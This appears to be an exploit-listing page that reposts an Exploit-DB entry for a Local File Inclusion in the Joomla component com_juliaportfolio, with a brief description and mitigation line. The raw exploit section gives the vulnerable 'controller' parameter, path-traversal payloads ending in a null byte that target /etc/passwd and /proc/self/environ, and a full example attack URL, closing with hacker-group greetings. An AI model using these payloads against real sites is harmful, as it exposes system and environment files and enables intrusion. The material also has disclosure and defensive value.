header-logo
Suggest Exploit
vendor:
N/A
by:
DevilZ TM By D3v1l
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

Joomla Component com_juliaportfolio Local File Inclusion

A Local File Inclusion (LFI) vulnerability exists in Joomla Component com_juliaportfolio. An attacker can exploit this vulnerability to include local files on the server. The vulnerable parameter is ‘controller’ which can be exploited by using ‘../’ to traverse to the parent directory. An attacker can use this vulnerability to include local files on the server such as /etc/passwd and /proc/self/environ.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to directory traversal attacks. This can be done by validating user input and sanitizing it before using it in the application.
Source

Exploit-DB raw data:

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_juliaportfolio Local File Inclusion 
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Contact   : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_juliaportfolio&controller=[LFI]
 
[~] ExploiT         :
 
../../../../../../../../../../etc/passwd%00

../../../../../../../../../../proc/self/environ%00
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../etc/passwd%00
 
 
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]